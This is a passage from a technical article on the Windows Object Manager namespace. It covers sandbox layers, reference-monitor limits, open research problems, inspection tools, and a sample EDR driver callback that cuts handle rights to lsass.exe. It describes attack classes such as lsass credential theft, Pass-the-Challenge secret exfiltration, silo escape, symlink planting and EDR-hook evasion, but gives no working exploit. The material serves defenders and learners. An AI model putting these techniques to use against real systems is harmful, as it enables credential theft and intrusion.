&lt;td&gt;Linux Namespace&lt;/td&gt;
&lt;td&gt;Per-resource clone&lt;/td&gt;
&lt;td&gt;&lt;code&gt;setns&lt;/code&gt;/&lt;code&gt;unshare&lt;/code&gt;/&lt;code&gt;clone&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Structural&lt;/td&gt;
&lt;td&gt;&lt;code&gt;CAP_SYS_ADMIN&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Fork inherits namespace set&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Mach Port Right&lt;/td&gt;
&lt;td&gt;Per-task&lt;/td&gt;
&lt;td&gt;Capability check on send&lt;/td&gt;
&lt;td&gt;Structural (capabilities)&lt;/td&gt;
&lt;td&gt;&lt;code&gt;host_priv&lt;/code&gt; / kernel&lt;/td&gt;
&lt;td&gt;Inherited rights on fork&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;

The Object Manager namespace is not a filesystem. There is no disk persistence, no journal, no FAT or MFT, no inode allocator, no per-file DACL in the filesystem sense. Nothing under `\` survives a reboot. Files-on-disk, registry-keys-in-a-hive, and named pipes are leaves in the OM tree, but the actual filesystem implementation lives in NTFS / ReFS / ExFAT drivers reached through the `Device` type&apos;s parse procedure.&lt;p&gt;What the OM namespace &lt;em&gt;shares&lt;/em&gt; with filesystems is exactly three things: the path-walk algorithm (left-to-right, component-by-component, with one hash-table lookup per component), the per-directory hash table (analogous to the directory-entry hash filesystems use), and the per-object security descriptor (which the SRM enforces at the same point a filesystem would enforce its DACL).&lt;/p&gt;
&lt;p&gt;When you read or write the phrase &quot;Object Manager namespace,&quot; the metaphor that is doing real work is &quot;in-memory directory tree the kernel uses to find named objects,&quot; not &quot;filesystem in the disk-format sense.&quot;
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;

The Windows 2000-era `CreateRestrictedToken` primitive was the wrong layer in 2000 as a standalone sandboxing mechanism -- it could not partition the namespace; it only filtered the caller&apos;s SID set against per-object DACLs. Chromium revived it in 2008 as one of four cooperating layers, and that pattern is the canonical 2026 production sandbox shape. The Chromium design document captures the constraints: &quot;The Windows sandbox is a user-mode only sandbox. There are no special kernel mode drivers... The sandbox is provided as a static library that must be linked to both the broker and the target executables&quot; (Chromium Sandbox Design [@chromium-sandbox-md], FAQ [@chromium-sandbox-faq]).&lt;p&gt;The four layers compose pairwise-orthogonally. The token gates &lt;em&gt;which DACLs&lt;/em&gt; the renderer can satisfy at &lt;code&gt;SeAccessCheck&lt;/code&gt; time; the job object gates &lt;em&gt;which kernel API surface&lt;/em&gt; the renderer can call (UI exceptions, process creation, etc.); the integrity level gates &lt;em&gt;which writes&lt;/em&gt; the renderer can perform across MIC label boundaries; the AppContainer lowbox-rewrites &lt;em&gt;every named-object lookup&lt;/em&gt; into the per-package directory inside &lt;code&gt;ObpLookupObjectName&lt;/code&gt;. A handle that survives all four checks is the only object the renderer can usefully touch. The load-bearing header is &lt;code&gt;sandbox_policy.h&lt;/code&gt;, which declares &lt;code&gt;TargetConfig::SetTokenLevel(TokenLevel initial, TokenLevel lockdown)&lt;/code&gt;, &lt;code&gt;SetJobLevel&lt;/code&gt;, &lt;code&gt;SetIntegrityLevel&lt;/code&gt;, &lt;code&gt;SetDelayedIntegrityLevel&lt;/code&gt;, and &lt;code&gt;SetAppContainerSid&lt;/code&gt;, with one verbatim mutual-exclusion note: &quot;Using an initial token is not compatible with AppContainer&quot; [@chromium-sandbox-policy-h].&lt;/p&gt;
&lt;p&gt;This is the 2026 production sandbox shape every Chromium-based browser inherits (Edge, Chrome, Brave, Vivaldi, Opera), as do Electron-based apps like Visual Studio Code&apos;s renderer processes.
&lt;/p&gt;&lt;p&gt;&lt;/p&gt;

The cross-VTL ALPC ports through which a VTL0 process talks to a VTL1 trustlet are still located in VTL0&apos;s `\RPC Control`. An attacker who controls VTL0 can *send* messages to LsaIso even though they cannot *read* LsaIso&apos;s internal state. Oliver Lyak&apos;s December 2022 *Pass-the-Challenge* result is the canonical worked example ([GitHub: ly4k/PassTheChallenge](https://github.com/ly4k/PassTheChallenge)): the trustlet&apos;s pages are never read, but the trustlet&apos;s RPC output exfiltrates the secret. The lesson is that VTL1 isolation is a *page-level* read barrier, not a *protocol-level* containment property. The VBS Trustlets piece in this corpus carries the deeper walkthrough.
&lt;p&gt;Windows bet on one tree; Linux bet on eight clone-flag dimensions; Darwin bet on capability-style port-right tables. Each bet has theoretical limits. What are they?&lt;/p&gt;
&lt;h2&gt;8. What the namespace cannot do&lt;/h2&gt;
&lt;p&gt;The frame for this section comes from James P. Anderson&apos;s 1972 USAF technical report &lt;em&gt;Computer Security Technology Planning Study&lt;/em&gt; (ESD-TR-73-51), Section 4.1.1. Anderson is the named originator of the reference-monitor concept and of the four properties such a monitor must satisfy. Wikipedia preserves the modern acronym verbatim: the reference-validation mechanism must be &quot;&lt;strong&gt;N&lt;/strong&gt;on-bypassable... &lt;strong&gt;E&lt;/strong&gt;valuable... &lt;strong&gt;A&lt;/strong&gt;lways invoked... &lt;strong&gt;T&lt;/strong&gt;amper-proof,&quot; and &quot;according to Ross Anderson, the reference monitor concept was introduced by James Anderson in an influential 1972 paper&quot; [@wikipedia-reference-monitor]. The NIST CSRC mirror hosts the original PDF [@csrc-nist-ande72].&lt;/p&gt;
&lt;p&gt;Saltzer and Schroeder&apos;s 1975 paper &lt;em&gt;The Protection of Information in Computer Systems&lt;/em&gt; [@cs-virginia-saltzer-schroeder] added the &lt;em&gt;complete-mediation principle&lt;/em&gt; -- &quot;every access to every object must be checked for authority&quot; -- and seven other design principles the reference-validation mechanism must satisfy (economy of mechanism, fail-safe defaults, open design, separation of privilege, least privilege, least common mechanism, psychological acceptability).&lt;/p&gt;
&lt;p&gt;Map the Windows Object Manager against the four NEAT properties and the answer is uncomfortable. The namespace partially achieves two (Always-invoked and Tamper-proof), fails Non-bypassable outright, and falls one to two orders of magnitude short of Evaluable.&lt;/p&gt;
&lt;h3&gt;8.1 Always-invoked: provably gapped&lt;/h3&gt;
&lt;p&gt;The namespace achieves always-invoked for &lt;em&gt;name-based opens&lt;/em&gt;. Every &lt;code&gt;Nt*OpenObject*&lt;/code&gt; syscall walks &lt;code&gt;ObpLookupObjectName&lt;/code&gt;; there is no path that returns a handle to a named object without going through the lookup. But the namespace cannot achieve always-invoked for &lt;em&gt;handle inheritance&lt;/em&gt;. A child process inherits handles from &lt;code&gt;CreateProcess(bInheritHandles=TRUE)&lt;/code&gt; without going through the OM at all. The handles already exist in the parent&apos;s &lt;code&gt;HANDLE_TABLE&lt;/code&gt;; the kernel walks the parent&apos;s table, duplicates the entries into the child&apos;s table, and the child has live access. No name-lookup, no &lt;code&gt;ObRegisterCallbacks&lt;/code&gt; callback, no SRM check. As long as the OS API exposes handle inheritance -- and it is too deeply embedded in 33 years of shipping Windows code to remove -- the Object Manager cannot be the &lt;em&gt;sole&lt;/em&gt; reference monitor.&lt;/p&gt;
&lt;h3&gt;8.2 Tamper-proof: bounded, not absolute&lt;/h3&gt;
&lt;p&gt;The Object Manager runs in ring 0, under Kernel-Mode Code Signing (KMCS), and -- on machines with Virtualization-Based Security and Hypervisor-protected Code Integrity (HVCI) enabled -- inside a Hyper-V-enforced code-integrity policy. Any kernel-mode adversary who can load a driver bypasses the OM. KMCS and HVCI raise the cost; they do not eliminate the surface. The Bring-Your-Own-Vulnerable-Driver class of attacks (signed but exploitable drivers) is the running residual class, and the historical pattern is that one or two new vulnerable signed drivers surface every quarter.&lt;/p&gt;
&lt;h3&gt;8.3 Evaluable: provably above threshold&lt;/h3&gt;
&lt;p&gt;A small enough TCB can be machine-verified. The seL4 microkernel is the canonical demonstration: roughly 9,000 lines of C verified end-to-end against a formal specification (~11 person-years for initial functional correctness per Klein et al. SOSP 2009, and approximately 25 person-years for the full suite of subsequent proofs including information-flow and binary verification) [@sel4-project]. The Object Manager subsystem, the Security Reference Monitor, and the parse procedures the Object Manager delegates to (file-system drivers via &lt;code&gt;IopParseDevice&lt;/code&gt;; the registry via &lt;code&gt;CmpParseKey&lt;/code&gt;; ALPC; the I/O manager itself) collectively comprise tens of thousands of lines of C, putting the TCB for &quot;open a named object&quot; at one to two orders of magnitude above the verification threshold any current proof system can handle. The Object Manager is &lt;em&gt;not&lt;/em&gt; evaluable in the formal sense Anderson required.&lt;/p&gt;
&lt;h3&gt;8.4 Non-bypassable: the privilege short-circuit&lt;/h3&gt;
&lt;p&gt;A process holding &lt;code&gt;SeDebugPrivilege&lt;/code&gt; (or any privilege that grants &lt;code&gt;PROCESS_VM_*&lt;/code&gt; rights) can short-circuit per-directory ACLs. The privilege evaluation happens at &lt;code&gt;SeAccessCheck&lt;/code&gt; time, &lt;em&gt;after&lt;/em&gt; &lt;code&gt;ObpLookupObjectName&lt;/code&gt; has resolved the name. The Object Manager will resolve any path the privileged caller asks for; the gate fires, but it lets the call through. The namespace cannot defend against the holder of &lt;code&gt;SeDebugPrivilege&lt;/code&gt;. This is by design -- you want a debugger to be able to attach to anything -- but it is also the structural reason why &quot;lock down the namespace&quot; is not by itself a containment story.&lt;/p&gt;
&lt;h3&gt;8.5 What else the namespace cannot do&lt;/h3&gt;
&lt;p&gt;It cannot prevent in-process memory disclosure -- the Pass-the-Challenge limit covered in the Section 7 aside. It cannot defend against a malicious driver -- KMCS, HVCI, and WDAC gate driver load; the namespace itself trusts already-loaded drivers. It cannot eliminate time-of-check / time-of-use racing during a path walk; the walker walks components one at a time, and any reentrant call into the walker is a TOCTOU surface. The mitigation is per-call -- callers pass &lt;code&gt;OBJ_DONT_REPARSE&lt;/code&gt; on object-attributes, &lt;code&gt;FILE_FLAG_OPEN_REPARSE_POINT&lt;/code&gt; on file opens, or otherwise instruct the path-walker to refuse symbolic-link substitution -- not a structural property of the namespace.&lt;/p&gt;
&lt;h3&gt;8.6 The honest accounting&lt;/h3&gt;
&lt;p&gt;The Object Manager namespace is a &lt;em&gt;coordination&lt;/em&gt; mechanism, not a &lt;em&gt;containment&lt;/em&gt; mechanism. Containment is in the layers above: the session ID, the package SID, the integrity level, the silo ID, the VTL split. The namespace&apos;s job is to make those layers &lt;em&gt;enforceable&lt;/em&gt; by partitioning the path space so the bad open &lt;em&gt;cannot resolve to the privileged object&apos;s name&lt;/em&gt;. The layers above decide which partition the caller is in; the namespace&apos;s only job is &quot;given a path and a caller, find the object.&quot; Anderson 1972 names the &lt;em&gt;kernel mechanism&lt;/em&gt; (the reference-validation mechanism with NEAT properties); Saltzer-Schroeder 1975 names the &lt;em&gt;design principles&lt;/em&gt; the mechanism must satisfy. The Object Manager is the Windows realisation; it inherits both the strengths and the limits.&lt;/p&gt;

The namespace is a coordination mechanism, not a containment mechanism. The containment is in the layers above.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The Object Manager is the coordination layer; the containment is in the partition primitives stacked on top (session ID, package SID, integrity level, silo ID, VTL). The namespace&apos;s only job is &quot;given a path and a caller, find the object.&quot; Every Windows security boundary is a parameter to that one job: a per-directory ACL, a token-keyed name rewrite, or a kernel callback registered against an &lt;code&gt;OBJECT_TYPE&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The provable gaps are real. What is the active research direction in 2026 -- where do attackers and defenders actually meet inside the namespace today?&lt;/p&gt;
&lt;h2&gt;9. Open problems in 2026&lt;/h2&gt;
&lt;p&gt;Five open problems sit in active research as of 2026.&lt;/p&gt;
&lt;h3&gt;9.1 Hash-bucket collision pressure&lt;/h3&gt;
&lt;p&gt;The 37-bucket constant has not changed since 1993. On a 2026 Windows 11 25H2 machine with several hundred MSIX packages, each owning an &lt;code&gt;\AppContainerNamedObjects\&amp;lt;package-sid&amp;gt;\&lt;/code&gt; subtree, average chain lengths inside &lt;code&gt;\Sessions\1\AppContainerNamedObjects&lt;/code&gt; exceed two and routinely run higher under load. The structural impact is small per-lookup (O(chain length) at each component), but it compounds across deep path walks and across the per-VM hot loops in &lt;code&gt;ObpLookupObjectName&lt;/code&gt;. Microsoft has not committed to a larger table or a different structure; the constant remains.&lt;/p&gt;
&lt;h3&gt;9.2 Cross-AppContainer object-directory privacy&lt;/h3&gt;
&lt;p&gt;Per-AppContainer isolation is the AppContainer model&apos;s promise; residual cross-package reads erode it. Forshaw&apos;s Project Zero work between 2017 and 2020 documents specific classes; Windows 11 25H2 DACLs are tighter than Windows 10 RTM, but the impersonation-mediated cases survive. The HackSys / CVE-2023-35359 family covered in Section 4.5 is the current realisation of the cross-AppContainer-plus-impersonation surface, and the same broader resource-planting taxonomy Forshaw described in the 2017 Named Pipe Secure Prefixes post [@tiraniddo-named-pipe-secure-prefixes] is still rediscovered every year.&lt;/p&gt;
&lt;h3&gt;9.3 Silo-escape via routines that ignore silo attachment&lt;/h3&gt;
&lt;p&gt;&lt;em&gt;Siloscape&lt;/em&gt; (June 7, 2021) showed that &lt;code&gt;NtSetInformationSymbolicLink&lt;/code&gt; could retarget a silo-scoped symbolic link at a host-scoped path. Microsoft patched the specific function; the &lt;em&gt;class&lt;/em&gt; -- kernel routines whose path resolution does not honour &lt;code&gt;Process-&amp;gt;Silo-&amp;gt;RootDirectory&lt;/code&gt; -- remains open. Microsoft&apos;s long-standing position is that Server Silo is not a security boundary; Hyper-V Container is the security-boundary product. Container runtimes that depend on Server Silo for tenant isolation are knowingly running outside the supported boundary.&lt;/p&gt;
&lt;h3&gt;9.4 ObRegisterCallbacks erosion under HVCI&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;ObRegisterCallbacks&lt;/code&gt; requires a KMCS-signed driver, and on HVCI-enabled machines the binary must additionally be HVCI-compatible. Microsoft has progressively raised the compatibility bar -- preventing unsigned drivers, banning common runtime-patching idioms, and tightening the W^X policy. EDR vendors depend on the surface staying open; if HVCI&apos;s compatibility bar ever excludes the EDR kernel driver pattern, the in-kernel callback layer is at risk. The CrowdStrike Falcon Sensor outage of July 2024 made the brittleness of in-kernel EDR a public conversation. Microsoft&apos;s &lt;em&gt;Defender for Endpoint&lt;/em&gt; and &lt;em&gt;EDR-on-Linux eBPF&lt;/em&gt; projects point at alternative-mediation futures, but in-kernel &lt;code&gt;ObRegisterCallbacks&lt;/code&gt; is still the primary credential-theft sensor.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; As attackers ship Hell&apos;s Gate / Halo&apos;s Gate / direct-syscall stubs to bypass userland EDR hooks, the kernel callback fires regardless. The arms race accordingly shifts to the &lt;em&gt;access-mask-strip vs. impersonate-trusted-parent-PID&lt;/em&gt; layer inside the kernel callback itself, with both sides racing to define the right pre-operation policy for &lt;code&gt;lsass.exe&lt;/code&gt; handle opens. Watch the Microsoft Security Response Center advisories and the EDR-vendor incident postmortems for the bleeding edge.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;9.5 Public benchmark vacuum&lt;/h3&gt;
&lt;p&gt;No peer-reviewed benchmark compares per-call namespace-lookup cost across the Windows Object Manager, Linux namespaces, and Mach ports. Choice of namespace design at the OS level is a multi-decade commitment; the absence of an empirical comparison forces architecture decisions on theoretical-only grounds. The Linux Kernel Test Robot, the Phoronix Test Suite, and various academic systems-conference benchmarks measure adjacent properties (filesystem-call latency, system-call vector cost), but none publishes head-to-head numbers on the named-object-lookup hot path. This is an open invitation to systems researchers.&lt;/p&gt;
&lt;p&gt;Five open problems is a research agenda, not a how-to. How do you actually look at this thing on your own machine?&lt;/p&gt;
&lt;h2&gt;10. Reading the namespace from a live system&lt;/h2&gt;
&lt;p&gt;Three tools cover the operational practice: Sysinternals WinObj, Forshaw&apos;s NtObjectManager PowerShell module, and WinDbg in kernel mode.&lt;/p&gt;
&lt;h3&gt;10.1 WinObj on a live system&lt;/h3&gt;
&lt;p&gt;Download &lt;code&gt;winobj.exe&lt;/code&gt; from Sysinternals [@ms-winobj] and run it as administrator. The left pane is the directory tree; the right pane shows the children of the selected directory with their object types. Navigate to &lt;code&gt;\Sessions\1\BaseNamedObjects&lt;/code&gt; and read off the named events and mutants every Win32 app in your interactive session has created. Navigate to &lt;code&gt;\Sessions\1\AppContainerNamedObjects&lt;/code&gt; and pick an &lt;code&gt;S-1-15-2-...&lt;/code&gt; directory; right-click, choose Properties, and read the security descriptor. You will see a single allow-ACE granting full access only to the package SID itself. That ACE is the entire AppContainer sandbox at the namespace layer.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; WinObj cannot traverse &lt;code&gt;\ObjectTypes&lt;/code&gt;, &lt;code&gt;\Security&lt;/code&gt;, or &lt;code&gt;\Sessions\0\&lt;/code&gt; without administrator rights. Without traversal, the enumerate fails silently and the tree looks empty. Always run elevated, and accept that the tool will show the kernel view, not a per-process view.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;10.2 NtObjectManager PowerShell&lt;/h3&gt;
&lt;p&gt;&lt;code&gt;NtObjectManager&lt;/code&gt; is Forshaw&apos;s PowerShell module that exposes the Object Manager namespace through cmdlets (PowerShell Gallery [@powershellgallery-ntobjectmanager]; GitHub [@p0-sandbox-attacksurface-analysis-tools]). Install with &lt;code&gt;Install-Module NtObjectManager&lt;/code&gt;. Useful commands: &lt;code&gt;Get-ChildItem NtObject:\&lt;/code&gt; walks the root; &lt;code&gt;Get-NtType&lt;/code&gt; lists the registered &lt;code&gt;OBJECT_TYPE&lt;/code&gt; singletons; &lt;code&gt;Get-NtObject \BaseNamedObjects&lt;/code&gt; enumerates the global BNO; &lt;code&gt;Get-NtAlpcPort &apos;\RPC Control&apos;&lt;/code&gt; lists every LRPC endpoint on the machine. The module wraps the same NTDLL syscalls WinObj uses, but in a scripting surface that composes into automation.&lt;/p&gt;
&lt;h3&gt;10.3 WinDbg kernel session&lt;/h3&gt;
&lt;p&gt;In a kernel-mode WinDbg session attached to a target machine (or to a live local kernel via Microsoft&apos;s local-kernel debug mode), &lt;code&gt;!object \&lt;/code&gt; dumps the root directory and its children. &lt;code&gt;dt nt!_OBJECT_HEADER &amp;lt;addr&amp;gt;-30&lt;/code&gt; reads the header preceding any object&apos;s body (the offset 0x30 is the size of &lt;code&gt;OBJECT_HEADER&lt;/code&gt; on x64; subtract that from the body pointer to land on the header -- the field layout is documented in &lt;em&gt;Windows Internals 7th Edition* Chapter 8, Microsoft Press Store [@microsoftpressstore-wininternals7-part1]). `dx -r1 ((nt!_OBJECT_TYPE&lt;/em&gt;)nt!PsProcessType[0]).TypeInfo` walks the Process type&apos;s method table and lists all eight procedure pointers and the WaitObjectFlagOffset, including the parse procedure.&lt;/p&gt;
&lt;h3&gt;10.4 The EDR primitive: an ObRegisterCallbacks driver template&lt;/h3&gt;
&lt;p&gt;The minimal sketch of an in-kernel EDR sensor is four steps. Register an &lt;code&gt;OB_CALLBACK_REGISTRATION&lt;/code&gt; for &lt;code&gt;PsProcessType&lt;/code&gt; with &lt;code&gt;OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE&lt;/code&gt; [@ms-obregistercallbacks]. In the pre-operation callback, examine &lt;code&gt;OperationInformation-&amp;gt;Object&lt;/code&gt;, derive the target process&apos;s PID, and compare it against &lt;code&gt;lsass.exe&lt;/code&gt;. If it matches, strip credential-relevant access bits from &lt;code&gt;OperationInformation-&amp;gt;Parameters-&amp;gt;CreateHandleInformation.DesiredAccess&lt;/code&gt; (or duplicate-handle equivalent). The kernel grants the handle with the reduced rights, the attacker&apos;s &lt;code&gt;PROCESS_VM_READ&lt;/code&gt; is gone before the call returns, and the post-operation callback logs the attempt. The parallel API &lt;code&gt;PsSetCreateProcessNotifyRoutineEx&lt;/code&gt; [@ms-pssetcreateprocessnotifyroutineex] covers process creation, which is the other half of the EDR sensor surface.&lt;/p&gt;

sequenceDiagram
    participant A as Attacker process
    participant NT as nt!NtOpenProcess
    participant OM as Object Manager
    participant EDR as EDR Pre-Op Callback
    participant LSASS as lsass.exe (target)
    A-&amp;gt;&amp;gt;NT: NtOpenProcess(lsass PID, PROCESS_VM_READ | PROCESS_QUERY_INFORMATION)
    NT-&amp;gt;&amp;gt;OM: lookup PsProcessType, target by PID
    OM-&amp;gt;&amp;gt;EDR: fire pre-op callback (handle create)
    EDR-&amp;gt;&amp;gt;EDR: target == lsass.exe?
    EDR-&amp;gt;&amp;gt;EDR: strip PROCESS_VM_READ from DesiredAccess
    EDR--&amp;gt;&amp;gt;OM: granted = PROCESS_QUERY_LIMITED_INFORMATION
    OM--&amp;gt;&amp;gt;NT: HANDLE with reduced access
    NT--&amp;gt;&amp;gt;A: open succeeded (but useless rights)
&lt;p&gt;{`
const PROCESS_VM_READ                   = 0x0010;
const PROCESS_VM_WRITE                  = 0x0020;
const PROCESS_VM_OPERATION              = 0x0008;
const PROCESS_QUERY_INFORMATION         = 0x0400;
const PROCESS_QUERY_LIMITED_INFORMATION = 0x1000;
const PROCESS_CREATE_THREAD             = 0x0002;
const PROCESS_DUP_HANDLE                = 0x0040;&lt;/p&gt;
&lt;p&gt;function stripForLsass(desired) {
  const STRIPPED =
      PROCESS_VM_READ |
      PROCESS_VM_WRITE |
      PROCESS_VM_OPERATION |
      PROCESS_CREATE_THREAD |
      PROCESS_DUP_HANDLE |
      PROCESS_QUERY_INFORMATION;
  return desired &amp;amp; ~STRIPPED;
}&lt;/p&gt;
&lt;p&gt;const desired = PROCESS_VM_READ | PROCESS_QUERY_INFORMATION | PROCESS_DUP_HANDLE;
console.log(&apos;attacker asked for:&apos;, &apos;0x&apos; + desired.toString(16));
const granted = stripForLsass(desired) | PROCESS_QUERY_LIMITED_INFORMATION;
console.log(&apos;EDR pre-op granted:&apos;, &apos;0x&apos; + granted.toString(16));
`}&lt;/p&gt;

```c
OB_OPERATION_REGISTRATION op = {
    .ObjectType = PsProcessType,
    .Operations = OB_OPERATION_HANDLE_CREATE | OB_OPERATION_HANDLE_DUPLICATE,
    .PreOperation = MyPreOp,
    .PostOperation = MyPostOp,
};
OB_CALLBACK_REGISTRATION reg = {
    .Version = OB_FLT_REGISTRATION_VERSION,
    .OperationRegistrationCount = 1,
    .Altitude = RTL_CONSTANT_STRING(L&quot;123456&quot;),
    .OperationRegistration = &amp;amp;op,
};
ObRegisterCallbacks(®, &amp;amp;g_handle);
```
The driver must be KMCS-signed (`IMAGE_DLLCHARACTERISTICS_FORCE_INTEGRITY`) per the wdm.h documentation; an unsigned image returns `STATUS_ACCESS_DENIED` from `ObRegisterCallbacks`. Two drivers cannot pick the same Altitude; collisions return `STATUS_FLT_INSTANCE_ALTITUDE_COLLISION`.
&lt;p&gt;You can now read the namespace, register an EDR-style callback, and dump the type registry. What are the questions readers ask after they finish reading?&lt;/p&gt;
&lt;h2&gt;11. Frequently asked questions&lt;/h2&gt;


No. The registry is a separate Windows Executive subsystem implemented in `nt!Cm*`, with its own hive on-disk format and its own in-memory hive structures. It hooks into the Object Manager namespace through one and only one mechanism: the `Key` `OBJECT_TYPE` registers a `ParseProcedure` (`CmpParseKey`) that takes over path walking when the namespace walker reaches `\REGISTRY`. The registry is therefore a *consumer* of the Object Manager, but not part of the Object Manager.

Because `\BaseNamedObjects` is the *global* / `Global\`-prefixed-only view, distinct from the per-session BNO at `\Sessions\\BaseNamedObjects`. The Win32 `Local\` prefix routes through `kernel32!BaseGetNamedObjectDirectory` into the per-session BNO; `Global\` routes into the global one [@ms-termserv-kernel-object-namespaces]. Cross-session named-object coordination still needs the global view; per-session isolation lives in the per-session subtree.

Because the lowbox token attached to the UWP app&apos;s process tells `ObpLookupObjectName` to rewrite the path to `\Sessions\\AppContainerNamedObjects\\Global\Foo` before path walking. Two different UWP apps have two different package SIDs and therefore land on two different directories. The Win32 names look the same; the kernel resolves them to different objects.

`\??\C:` is the per-session DosDevices alias; if `C:` is not defined in the current session&apos;s `\??`, the walker falls through to `\GLOBAL??\C:`. `\GLOBAL??\C:` is the machine-wide DosDevices symbolic link to `\Device\HarddiskVolume*` -- the real on-disk volume object. The split matters because the per-session `\??` is where per-session drive-letter remappings (`net use X: \\server\share`, `subst Z: C:\foo`, `DefineDosDevice`) live, and the activation-context resolver class covered in Section 4.5 is the exploit family that lives at this boundary.

Several top-level directories have `Directory`-`TRAVERSE` ACLs that restrict to SYSTEM and the local Administrators group. Without traversal, the directory enumeration silently fails. `\ObjectTypes`, `\Security`, and `\Sessions\0\` are the directories users most often notice as &quot;missing&quot; when running unelevated.

By DACL plus loader-side validation. The directory grants `Directory`-`READ` to everyone but `Directory`-`WRITE` only to SYSTEM and TrustedInstaller. The `Section` objects inside are Authenticode-signed by Microsoft and validated at boot by `smss.exe`. The historical `DefineDosDevice` + `\??` symlink-plant bypass class survived until Windows 10 21H2 build 19044.1826 (July 2022), when an NTDLL patch closed it [@itm4n-the-end-of-ppldump].

`ObRegisterCallbacks` [@ms-obregistercallbacks] and `PsSetCreateProcessNotifyRoutineEx` [@ms-pssetcreateprocessnotifyroutineex] are both fully documented. The HVCI compatibility requirements, the KMCS attestation flow, and the exact policy interactions with Defender for Endpoint&apos;s tamper-protection layer are partly implementation-defined; EDR vendor engineering teams maintain private regression suites against successive Windows feature updates.

When two or more processes that don&apos;t share a session or package must coordinate over a securable directory keyed by a SID-list they agree on at design time. The boundary descriptor is the *agreement primitive*: the kernel requires every SID in the boundary to be in the caller&apos;s token. The namespace&apos;s `OBJECT_DIRECTORY` lives in `\BNOLINKS`, keyed by the alias-prefix string plus a hash of the boundary descriptor&apos;s SID-list (CreatePrivateNamespaceW [@ms-createprivatenamespacew]; Object Namespaces overview [@ms-object-namespaces]; native NtCreatePrivateNamespace [@ntdoc-ntcreateprivatenamespace] and OBJECT_BOUNDARY_DESCRIPTOR [@ntdoc-object-boundary-descriptor] signatures). From inside an AppContainer process the lookup is rewritten into the per-package subtree, so private namespaces are not a substitute for the `windows.applicationModel.*` brokered APIs when cross-package coordination is the goal.


A user-mode structure produced by `CreateBoundaryDescriptor` and populated with `AddSIDToBoundaryDescriptor` (plus the optional `CREATE_BOUNDARY_DESCRIPTOR_ADD_APPCONTAINER_SID` flag). Conceptually the descriptor is a SID-list that the caller and every other participant must share via their tokens. Kernel-side the structure is `OBJECT_BOUNDARY_DESCRIPTOR` (Version, Items, TotalSize, Flags). `NtCreatePrivateNamespace` materialises a directory in `\BNOLINKS` keyed by the `lpAliasPrefix` plus a hash of the boundary descriptor&apos;s SIDs.
&lt;h2&gt;12. Coming back to the WinObj screen&lt;/h2&gt;
&lt;p&gt;Open WinObj one more time. Navigate back to &lt;code&gt;\Sessions\1\AppContainerNamedObjects&lt;/code&gt; and pick the Edge renderer&apos;s &lt;code&gt;S-1-15-2-...&lt;/code&gt; directory. You can now name everything you are looking at. The directory is an &lt;code&gt;_OBJECT_DIRECTORY&lt;/code&gt; instance with 37 hash buckets. You reach it through a token-keyed rewrite that the kernel applies inside &lt;code&gt;ObpLookupObjectName&lt;/code&gt; before path walking begins. Its security descriptor grants &lt;code&gt;GenericAll&lt;/code&gt; only to the package SID. Every EDR loaded on this machine has registered an &lt;code&gt;ObRegisterCallbacks&lt;/code&gt; filter on &lt;code&gt;PsProcessType&lt;/code&gt;, watching for handle creations against &lt;code&gt;lsass.exe&lt;/code&gt;. If you are running on a Server SKU with Windows Server Containers, the directory might also be silo-scoped, with &lt;code&gt;Process-&amp;gt;Silo-&amp;gt;RootDirectory&lt;/code&gt; indirecting your view of the rest of &lt;code&gt;\&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The four pieces of the 1993 Cutler design have shipped without architectural change for thirty-three years. The six generations of partition primitives stacked on top are all simultaneously load-bearing on Windows 11 25H2. The namespace itself is a coordination mechanism, in Anderson 1972&apos;s sense of the reference-validation mechanism, with Saltzer-Schroeder 1975&apos;s complete-mediation principle as the design constraint it must satisfy. Containment lives in the partition layers above it: the session, the package, the integrity level, the silo, and the VTL split. Every other article in this corpus -- the Credential Guard piece, the AppContainer piece, the VBS Trustlets piece, the Hyper-V piece, the App Identity piece, the TPM piece -- quietly assumes this tree underneath them.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Every Windows security boundary is a path rewrite, a per-directory ACL, a token-keyed name substitution, or a kernel callback against an &lt;code&gt;OBJECT_TYPE&lt;/code&gt;. The Object Manager is the data structure underneath them all.&lt;/p&gt;
&lt;/blockquote&gt;

**Key terms.** Object Manager (`Ob`), `OBJECT_HEADER`, `OBJECT_TYPE`, `ParseProcedure`, `OBJECT_DIRECTORY`, Lowbox token, AppContainer, Server Silo, Trustlet / IUM, Boundary descriptor, Session 0 isolation, Mandatory Integrity Control, `ObRegisterCallbacks`, KMCS, HVCI, `\BaseNamedObjects`, `\Sessions\\AppContainerNamedObjects`, `\RPC Control`, `\KnownDlls`, `\BNOLINKS`, `\GLOBAL??`, `\??`.&lt;p&gt;&lt;strong&gt;Review questions.&lt;/strong&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Why does AppContainer isolation work even when the calling UWP app explicitly asks for &lt;code&gt;Global\X&lt;/code&gt;?&lt;/li&gt;
&lt;li&gt;What is the relationship between &lt;code&gt;IopParseDevice&lt;/code&gt;, &lt;code&gt;\Device\HarddiskVolume1&lt;/code&gt;, and &lt;code&gt;IRP_MJ_CREATE&lt;/code&gt;?&lt;/li&gt;
&lt;li&gt;Which of Anderson 1972&apos;s four NEAT properties does the Object Manager achieve cleanly, and which does it provably fail?&lt;/li&gt;
&lt;li&gt;Why is &lt;code&gt;ObRegisterCallbacks&lt;/code&gt; an enforcement gate only against handle creation and duplication, not against handle use?&lt;/li&gt;
